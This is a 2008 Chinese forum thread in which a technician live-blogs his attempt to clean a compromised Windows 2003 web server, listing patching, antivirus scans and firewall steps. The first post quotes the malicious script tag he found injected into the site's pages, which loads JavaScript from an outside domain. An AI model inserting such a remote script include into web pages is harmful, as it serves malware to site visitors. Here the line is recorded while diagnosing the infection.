打印

[应用交流] 服务器抢修行动－现场直播

本主题由 yuyang2008 于 2008-8-28 13:04 提升

IDC客服

技术员

Rank: 2

UID: 1325
帖子: 37
精华: 0
积分: 83
威望: 0
金币: 829
阅读权限: 20

1^# 大中小发表于 2008-8-23 20:59 只看该作者

服务器抢修行动－现场直播

晚上朋友打电话来，说是网站显示乱码，让帮帮忙。
打开朋友给的网址，一看，网页显示正常，应该是页面编码不对，不是什么大问题。
处于安全考虑，我查看了网页的源代码。乖乖，这不看不要紧，一打开头两行就是

复制内容到剪贴板

代码:

<script language=javascript src=http://www.sxdz99.com/mm/down.js[U1麆[U1麆[U1麆[U1麆[U1麆撣m飱壼w></script

（不要跟我说你不知道这是什么）
苗头不对，我得亲自过去一趟。

一到朋友的服务器，他正手足无措，说是刚才蓝屏了，刚刚重启。废话不说，抢过机子，就把朋友晾在一边了。以下是抢修现场的直播，记者IDC客服为您报道。

[ 本帖最后由 IDC客服于 2008-8-23 21:04 编辑 ]

搜索更多相关主题的帖子: win2003 服务器挂马

合理的排版＋打印＝学习效益最大化

TOP

IDC客服

技术员

Rank: 2

UID: 1325
帖子: 37
精华: 0
积分: 83
威望: 0
金币: 829
阅读权限: 20

2^# 大中小发表于 2008-8-23 21:04 只看该作者

机子是方正的圆明系列，装的win2003（整一部玩具服务器...不过也只有这种玩具才会找我来修，嘿嘿）
看了下桌面的任务栏，装了360arp防火墙（拼命报告被攻击）、360安全卫士、NOD32，用IIS搭建了ASP环境，还用Serv-U搭建了FTP。

升级360安全卫士
搜索恶评软件，把一个“有风险的临时文件”清了
启动项服务，没有异常
系统服务，没有异常
系统进程，没有异常

[ 本帖最后由 IDC客服于 2008-8-23 21:11 编辑 ]

合理的排版＋打印＝学习效益最大化

TOP

IDC客服

技术员

Rank: 2

UID: 1325
帖子: 37
精华: 0
积分: 83
威望: 0
金币: 829
阅读权限: 20

3^# 大中小发表于 2008-8-23 21:14 只看该作者

清理了下系统的临时文件（不小心把论坛cookie给清了，NND）
打系统补丁
升级杀毒软件

合理的排版＋打印＝学习效益最大化

TOP

IDC客服

技术员

Rank: 2

UID: 1325
帖子: 37
精华: 0
积分: 83
威望: 0
金币: 829
阅读权限: 20

4^# 大中小发表于 2008-8-23 21:28 只看该作者

那小子居然开了远程桌面...不管那么多，关了再说
装补丁花了不少时间，现在用最新的杀毒软件扫扫电脑，看看有没有什么问题

合理的排版＋打印＝学习效益最大化

TOP

盛世时代

高级工程师

Rank: 6 Rank: 6

UID: 1125
帖子: 9602
精华: 7
积分: 4510
威望: 36
金币: 11857
阅读权限: 70

5^# 大中小发表于 2008-8-23 21:29 只看该作者

我在看你现场直播呢，哈，编辑到一起不行吗？呵

TOP

IDC客服

技术员

Rank: 2

UID: 1325
帖子: 37
精华: 0
积分: 83
威望: 0
金币: 829
阅读权限: 20

6^# 大中小发表于 2008-8-23 22:09 只看该作者

SS，偷偷告诉你..我在变相顶帖...
又装了个防火墙，设置了访问规则。查毒也没发现问题。正奇怪呢，怎么啥事没有，这时候怪事发生了：

在这个局域网里，服务器的ip是
192.168.1.203
网站的ip也一样。
不过打开在收藏夹里的网页（这个服务器上的）
一会是192.168.1.23
一会是192.168.1.203
203就是我现在在弄的这部电脑，电脑现在一切正常
23是啥来的？手工输入ip，打开23的网站，发现挂马仍然存在

分别进入系统后台，用探针看了看，发现不是同一部电脑...
我晕了，我到底来这里干嘛的...不是修服务器吗，怎么变成无间道了？
“对不起，我是警察”..

[ 本帖最后由 IDC客服于 2008-8-23 22:12 编辑 ]

合理的排版＋打印＝学习效益最大化